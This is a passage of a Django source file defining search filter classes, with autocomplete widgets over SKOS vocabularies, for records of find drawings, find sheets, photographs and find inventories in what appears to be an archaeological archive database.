attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
site_id = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="site_id"
),
help_text=Finddrawing._meta.get_field('site_id').help_text,
label=Finddrawing._meta.get_field('site_id').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/site_id",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
source_original_copy_edited_copy = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="source_original_copy_edited_copy"
),
help_text=Finddrawing._meta.get_field('source_original_copy_edited_copy').help_text,
label=Finddrawing._meta.get_field('source_original_copy_edited_copy').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/source_original_copy_edited_copy",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
original_material = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="original_material"
),
help_text=Finddrawing._meta.get_field('original_material').help_text,
label=Finddrawing._meta.get_field('original_material').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/original_material",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
excavation_post_excavation = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="excavation_post_excavation"
),
help_text=Finddrawing._meta.get_field('excavation_post_excavation').help_text,
label=Finddrawing._meta.get_field('excavation_post_excavation').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/excavation_post_excavation",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
class Meta:
model = Finddrawing
fields = [
'id',
'legacy_id',
'fc_name',
'fc_directory',
'fc_type',
'fc_filename',
'fc_match',
'creator_metadata',
'creator_original',
'creator_scan',
'document_type',
'find_inventory_number',
'filename',
'document_id',
'document_title',
'filename_old',
'creation_date_original',
'creation_year_original',
'creation_date_scan',
'convolute_inventory_number',
'creation_date_metadata',
'bone_stone_inventory_number',
'storage_folder_original',
'equipment',
'resolution_scan_dpi',
'find_date',
'rendered_in_ink',
'original_comment',
'digitisation_comment',
'file_extension',
'copyright',
'access',
'site_id',
'source_original_copy_edited_copy',
'original_material',
'excavation_post_excavation',
]
class FindsheetsListFilter(django_filters.FilterSet):
legacy_id = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Findsheets._meta.get_field('legacy_id').help_text,
label=Findsheets._meta.get_field('legacy_id').verbose_name
)
fc_name = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Findsheets._meta.get_field('fc_name').help_text,
label=Findsheets._meta.get_field('fc_name').verbose_name
)
fc_directory = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Findsheets._meta.get_field('fc_directory').help_text,
label=Findsheets._meta.get_field('fc_directory').verbose_name
)
fc_type = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Findsheets._meta.get_field('fc_type').help_text,
label=Findsheets._meta.get_field('fc_type').verbose_name
)
fc_filename = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Findsheets._meta.get_field('fc_filename').help_text,
label=Findsheets._meta.get_field('fc_filename').verbose_name
)
fc_extension = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Findsheets._meta.get_field('fc_extension').help_text,
label=Findsheets._meta.get_field('fc_extension').verbose_name
)
filename = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Findsheets._meta.get_field('filename').help_text,
label=Findsheets._meta.get_field('filename').verbose_name
)
document_id = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Findsheets._meta.get_field('document_id').help_text,
label=Findsheets._meta.get_field('document_id').verbose_name
)
document_title = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Findsheets._meta.get_field('document_title').help_text,
label=Findsheets._meta.get_field('document_title').verbose_name
)
filename_old = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Findsheets._meta.get_field('filename_old').help_text,
label=Findsheets._meta.get_field('filename_old').verbose_name
)
creation_year_original = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Findsheets._meta.get_field('creation_year_original').help_text,
label=Findsheets._meta.get_field('creation_year_original').verbose_name
)
original_comment = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Findsheets._meta.get_field('original_comment').help_text,
label=Findsheets._meta.get_field('original_comment').verbose_name
)
digitisation_comment = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Findsheets._meta.get_field('digitisation_comment').help_text,
label=Findsheets._meta.get_field('digitisation_comment').verbose_name
)
file_extension = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="file_extension"
),
help_text=Findsheets._meta.get_field('file_extension').help_text,
label=Findsheets._meta.get_field('file_extension').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/file_extension",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
copyright = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="copyright"
),
help_text=Findsheets._meta.get_field('copyright').help_text,
label=Findsheets._meta.get_field('copyright').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/copyright",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
access = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="access"
),
help_text=Findsheets._meta.get_field('access').help_text,
label=Findsheets._meta.get_field('access').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/access",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
storage_original = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="storage_original"
),
help_text=Findsheets._meta.get_field('storage_original').help_text,
label=Findsheets._meta.get_field('storage_original').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/storage_original",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
site_id = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="site_id"
),
help_text=Findsheets._meta.get_field('site_id').help_text,
label=Findsheets._meta.get_field('site_id').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/site_id",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
equipment_scan = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="equipment_scan"
),
help_text=Findsheets._meta.get_field('equipment_scan').help_text,
label=Findsheets._meta.get_field('equipment_scan').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/equipment_scan",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
source_original_copy_edited_copy = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="source_original_copy_edited_copy"
),
help_text=Findsheets._meta.get_field('source_original_copy_edited_copy').help_text,
label=Findsheets._meta.get_field('source_original_copy_edited_copy').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/source_original_copy_edited_copy",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
original_material = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="original_material"
),
help_text=Findsheets._meta.get_field('original_material').help_text,
label=Findsheets._meta.get_field('original_material').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/original_material",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
excavation_post_excavation = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="excavation_post_excavation"
),
help_text=Findsheets._meta.get_field('excavation_post_excavation').help_text,
label=Findsheets._meta.get_field('excavation_post_excavation').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/excavation_post_excavation",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
class Meta:
model = Findsheets
fields = [
'id',
'legacy_id',
'fc_name',
'fc_directory',
'fc_type',
'fc_filename',
'fc_match',
'creator_metadata',
'creator_original',
'creator_scan',
'archaeological_object_id',
'document_type',
'find_inventory_number',
'convolute_inventory_number',
'bone_stone_inventory_number',
'filename',
'document_id',
'document_title',
'filename_old',
'creation_date_original',
'creation_year_original',
'creation_date_scan',
'creation_date_metadata',
'resolution_scan_dpi',
'excavation_object_id',
'original_comment',
'digitisation_comment',
'file_extension',
'copyright',
'access',
'storage_original',
'site_id',
'equipment_scan',
'source_original_copy_edited_copy',
'original_material',
'excavation_post_excavation',
]
class FotoborndigitalListFilter(django_filters.FilterSet):
legacy_id = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fotoborndigital._meta.get_field('legacy_id').help_text,
label=Fotoborndigital._meta.get_field('legacy_id').verbose_name
)
fc_name = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fotoborndigital._meta.get_field('fc_name').help_text,
label=Fotoborndigital._meta.get_field('fc_name').verbose_name
)
fc_directory = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fotoborndigital._meta.get_field('fc_directory').help_text,
label=Fotoborndigital._meta.get_field('fc_directory').verbose_name
)
fc_type = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fotoborndigital._meta.get_field('fc_type').help_text,
label=Fotoborndigital._meta.get_field('fc_type').verbose_name
)
fc_filename = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fotoborndigital._meta.get_field('fc_filename').help_text,
label=Fotoborndigital._meta.get_field('fc_filename').verbose_name
)
fc_extension = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fotoborndigital._meta.get_field('fc_extension').help_text,
label=Fotoborndigital._meta.get_field('fc_extension').verbose_name
)
folder_name = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fotoborndigital._meta.get_field('folder_name').help_text,
label=Fotoborndigital._meta.get_field('folder_name').verbose_name
)
folder_id = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fotoborndigital._meta.get_field('folder_id').help_text,
label=Fotoborndigital._meta.get_field('folder_id').verbose_name
)
folder_title = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fotoborndigital._meta.get_field('folder_title').help_text,
label=Fotoborndigital._meta.get_field('folder_title').verbose_name
)
folder_name_old = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fotoborndigital._meta.get_field('folder_name_old').help_text,
label=Fotoborndigital._meta.get_field('folder_name_old').verbose_name
)
path_filename_old = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fotoborndigital._meta.get_field('path_filename_old').help_text,
label=Fotoborndigital._meta.get_field('path_filename_old').verbose_name
)
path_filename_arche = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fotoborndigital._meta.get_field('path_filename_arche').help_text,
label=Fotoborndigital._meta.get_field('path_filename_arche').verbose_name
)
find_inventory_number_from_to = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fotoborndigital._meta.get_field('find_inventory_number_from_to').help_text,
label=Fotoborndigital._meta.get_field('find_inventory_number_from_to').verbose_name
)
creation_year_original = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fotoborndigital._meta.get_field('creation_year_original').help_text,
label=Fotoborndigital._meta.get_field('creation_year_original').verbose_name
)
original_comment = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fotoborndigital._meta.get_field('original_comment').help_text,
label=Fotoborndigital._meta.get_field('original_comment').verbose_name
)
digitisation_comment = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fotoborndigital._meta.get_field('digitisation_comment').help_text,
label=Fotoborndigital._meta.get_field('digitisation_comment').verbose_name
)
copyright = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="copyright"
),
help_text=Fotoborndigital._meta.get_field('copyright').help_text,
label=Fotoborndigital._meta.get_field('copyright').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/copyright",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
access = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="access"
),
help_text=Fotoborndigital._meta.get_field('access').help_text,
label=Fotoborndigital._meta.get_field('access').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/access",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
site_id = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="site_id"
),
help_text=Fotoborndigital._meta.get_field('site_id').help_text,
label=Fotoborndigital._meta.get_field('site_id').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/site_id",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
class Meta:
model = Fotoborndigital
fields = [
'id',
'legacy_id',
'fc_name',
'fc_directory',
'fc_type',
'fc_filename',
'fc_match',
'creator_metadata',
'folder_name',
'folder_id',
'folder_title',
'folder_name_old',
'path_filename_old',
'path_filename_arche',
'creation_date_metadata',
'find_inventory_number_from_to',
'excavation_object_id',
'creation_year_original',
'original_comment',
'digitisation_comment',
'document_type',
'copyright',
'access',
'site_id',
]
class FotosgescanntListFilter(django_filters.FilterSet):
legacy_id = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fotosgescannt._meta.get_field('legacy_id').help_text,
label=Fotosgescannt._meta.get_field('legacy_id').verbose_name
)
fc_name = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fotosgescannt._meta.get_field('fc_name').help_text,
label=Fotosgescannt._meta.get_field('fc_name').verbose_name
)
fc_directory = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fotosgescannt._meta.get_field('fc_directory').help_text,
label=Fotosgescannt._meta.get_field('fc_directory').verbose_name
)
fc_type = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fotosgescannt._meta.get_field('fc_type').help_text,
label=Fotosgescannt._meta.get_field('fc_type').verbose_name
)
fc_filename = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fotosgescannt._meta.get_field('fc_filename').help_text,
label=Fotosgescannt._meta.get_field('fc_filename').verbose_name
)
fc_extension = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fotosgescannt._meta.get_field('fc_extension').help_text,
label=Fotosgescannt._meta.get_field('fc_extension').verbose_name
)
filename = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fotosgescannt._meta.get_field('filename').help_text,
label=Fotosgescannt._meta.get_field('filename').verbose_name
)
document_id = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fotosgescannt._meta.get_field('document_id').help_text,
label=Fotosgescannt._meta.get_field('document_id').verbose_name
)
document_title = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fotosgescannt._meta.get_field('document_title').help_text,
label=Fotosgescannt._meta.get_field('document_title').verbose_name
)
filename_old = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fotosgescannt._meta.get_field('filename_old').help_text,
label=Fotosgescannt._meta.get_field('filename_old').verbose_name
)
photo_number = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fotosgescannt._meta.get_field('photo_number').help_text,
label=Fotosgescannt._meta.get_field('photo_number').verbose_name
)
creation_year_original = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fotosgescannt._meta.get_field('creation_year_original').help_text,
label=Fotosgescannt._meta.get_field('creation_year_original').verbose_name
)
pixel_size = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fotosgescannt._meta.get_field('pixel_size').help_text,
label=Fotosgescannt._meta.get_field('pixel_size').verbose_name
)
find_inventory_number = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fotosgescannt._meta.get_field('find_inventory_number').help_text,
label=Fotosgescannt._meta.get_field('find_inventory_number').verbose_name
)
season = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fotosgescannt._meta.get_field('season').help_text,
label=Fotosgescannt._meta.get_field('season').verbose_name
)
original_comment = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fotosgescannt._meta.get_field('original_comment').help_text,
label=Fotosgescannt._meta.get_field('original_comment').verbose_name
)
digitisation_comment = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fotosgescannt._meta.get_field('digitisation_comment').help_text,
label=Fotosgescannt._meta.get_field('digitisation_comment').verbose_name
)
file_extension = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="file_extension"
),
help_text=Fotosgescannt._meta.get_field('file_extension').help_text,
label=Fotosgescannt._meta.get_field('file_extension').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/file_extension",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
copyright = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="copyright"
),
help_text=Fotosgescannt._meta.get_field('copyright').help_text,
label=Fotosgescannt._meta.get_field('copyright').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/copyright",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
access = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="access"
),
help_text=Fotosgescannt._meta.get_field('access').help_text,
label=Fotosgescannt._meta.get_field('access').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/access",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
site_id = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="site_id"
),
help_text=Fotosgescannt._meta.get_field('site_id').help_text,
label=Fotosgescannt._meta.get_field('site_id').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/site_id",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
equipment_scan = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="equipment_scan"
),
help_text=Fotosgescannt._meta.get_field('equipment_scan').help_text,
label=Fotosgescannt._meta.get_field('equipment_scan').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/equipment_scan",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
source_original_copy_edited_copy = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="source_original_copy_edited_copy"
),
help_text=Fotosgescannt._meta.get_field('source_original_copy_edited_copy').help_text,
label=Fotosgescannt._meta.get_field('source_original_copy_edited_copy').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/source_original_copy_edited_copy",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
archaeological_object_type = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="archaeological_object_type"
),
help_text=Fotosgescannt._meta.get_field('archaeological_object_type').help_text,
label=Fotosgescannt._meta.get_field('archaeological_object_type').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/archaeological_object_type",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
find_type = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="find_type"
),
help_text=Fotosgescannt._meta.get_field('find_type').help_text,
label=Fotosgescannt._meta.get_field('find_type').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/find_type",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
find_material = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="find_material"
),
help_text=Fotosgescannt._meta.get_field('find_material').help_text,
label=Fotosgescannt._meta.get_field('find_material').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/find_material",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
excavation_post_excavation = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="excavation_post_excavation"
),
help_text=Fotosgescannt._meta.get_field('excavation_post_excavation').help_text,
label=Fotosgescannt._meta.get_field('excavation_post_excavation').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/excavation_post_excavation",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
class Meta:
model = Fotosgescannt
fields = [
'id',
'legacy_id',
'fc_name',
'fc_directory',
'fc_type',
'fc_filename',
'fc_match',
'creator_metadata',
'creator_original',
'creator_scan',
'filename',
'document_id',
'document_title',
'filename_old',
'film_number',
'photo_number',
'creation_date_original',
'excavation_id',
'creation_year_original',
'creation_date_scan',
'creation_date_metadata',
'document_type',
'resolution_scan_ppi',
'pixel_size',
'find_inventory_number',
'excavation_object_id',
'archaeological_object_id',
'season',
'original_comment',
'digitisation_comment',
'film_id',
'file_extension',
'copyright',
'access',
'site_id',
'equipment_scan',
'source_original_copy_edited_copy',
'archaeological_object_type',
'find_type',
'find_material',
'excavation_post_excavation',
]
class Fundinventar4DPuzzleIDListFilter(django_filters.FilterSet):
legacy_id = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fundinventar4DPuzzleID._meta.get_field('legacy_id').help_text,
label=Fundinventar4DPuzzleID._meta.get_field('legacy_id').verbose_name
)
fc_name = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fundinventar4DPuzzleID._meta.get_field('fc_name').help_text,
label=Fundinventar4DPuzzleID._meta.get_field('fc_name').verbose_name
)
fc_directory = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fundinventar4DPuzzleID._meta.get_field('fc_directory').help_text,
label=Fundinventar4DPuzzleID._meta.get_field('fc_directory').verbose_name
)
fc_type = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fundinventar4DPuzzleID._meta.get_field('fc_type').help_text,
label=Fundinventar4DPuzzleID._meta.get_field('fc_type').verbose_name
)
fc_filename = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fundinventar4DPuzzleID._meta.get_field('fc_filename').help_text,
label=Fundinventar4DPuzzleID._meta.get_field('fc_filename').verbose_name
)
fc_extension = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fundinventar4DPuzzleID._meta.get_field('fc_extension').help_text,
label=Fundinventar4DPuzzleID._meta.get_field('fc_extension').verbose_name
)
find_inventory_4dpuzzle_number = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fundinventar4DPuzzleID._meta.get_field('find_inventory_4dpuzzle_number').help_text,
label=Fundinventar4DPuzzleID._meta.get_field('find_inventory_4dpuzzle_number').verbose_name
)
find_local_number = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fundinventar4DPuzzleID._meta.get_field('find_local_number').help_text,
label=Fundinventar4DPuzzleID._meta.get_field('find_local_number').verbose_name
)
convolute_inventory_number = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fundinventar4DPuzzleID._meta.get_field('convolute_inventory_number').help_text,
label=Fundinventar4DPuzzleID._meta.get_field('convolute_inventory_number').verbose_name
)
corresponding_to_inventory_number = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fundinventar4DPuzzleID._meta.get_field('corresponding_to_inventory_number').help_text,
label=Fundinventar4DPuzzleID._meta.get_field('corresponding_to_inventory_number').verbose_name
)
find_comment = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fundinventar4DPuzzleID._meta.get_field('find_comment').help_text,
label=Fundinventar4DPuzzleID._meta.get_field('find_comment').verbose_name
)
stratum_comment = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fundinventar4DPuzzleID._meta.get_field('stratum_comment').help_text,
label=Fundinventar4DPuzzleID._meta.get_field('stratum_comment').verbose_name
)
storage_find = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fundinventar4DPuzzleID._meta.get_field('storage_find').help_text,
label=Fundinventar4DPuzzleID._meta.get_field('storage_find').verbose_name
)
relatedto = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="relatedto"
),
help_text=Fundinventar4DPuzzleID._meta.get_field('relatedto').help_text,
label=Fundinventar4DPuzzleID._meta.get_field('relatedto').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/relatedto",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
find_material = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="find_material"
),
help_text=Fundinventar4DPuzzleID._meta.get_field('find_material').help_text,
label=Fundinventar4DPuzzleID._meta.get_field('find_material').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/find_material",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
digitisation_comment = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fundinventar4DPuzzleID._meta.get_field('digitisation_comment').help_text,
label=Fundinventar4DPuzzleID._meta.get_field('digitisation_comment').verbose_name
)
find_type = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="find_type"
),
help_text=Fundinventar4DPuzzleID._meta.get_field('find_type').help_text,
label=Fundinventar4DPuzzleID._meta.get_field('find_type').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/find_type",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
access = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="access"
),
help_text=Fundinventar4DPuzzleID._meta.get_field('access').help_text,
label=Fundinventar4DPuzzleID._meta.get_field('access').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/access",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
uncertainty_excavation_digitisation = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="uncertainty_excavation_digitisation"
),
help_text=Fundinventar4DPuzzleID._meta.get_field('uncertainty_excavation_digitisation').help_text,
label=Fundinventar4DPuzzleID._meta.get_field('uncertainty_excavation_digitisation').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/uncertainty_excavation_digitisation",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
creator_metadata = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="creator_metadata"
),
help_text=Fundinventar4DPuzzleID._meta.get_field('creator_metadata').help_text,
label=Fundinventar4DPuzzleID._meta.get_field('creator_metadata').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/creator_metadata",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
archaeological_object_id = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="archaeological_object_id"
),
help_text=Fundinventar4DPuzzleID._meta.get_field('archaeological_object_id').help_text,
label=Fundinventar4DPuzzleID._meta.get_field('archaeological_object_id').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/archaeological_object_id",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
stratum_id_relative = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="stratum_id_relative"
),
help_text=Fundinventar4DPuzzleID._meta.get_field('stratum_id_relative').help_text,
label=Fundinventar4DPuzzleID._meta.get_field('stratum_id_relative').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/stratum_id_relative",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
stratum_id_absolute_prepub = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="stratum_id_absolute_prepub"
),
help_text=Fundinventar4DPuzzleID._meta.get_field('stratum_id_absolute_prepub').help_text,
label=Fundinventar4DPuzzleID._meta.get_field('stratum_id_absolute_prepub').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/stratum_id_absolute_prepub",
attrs={
'data-placeholder': 'Autocomplete ...',
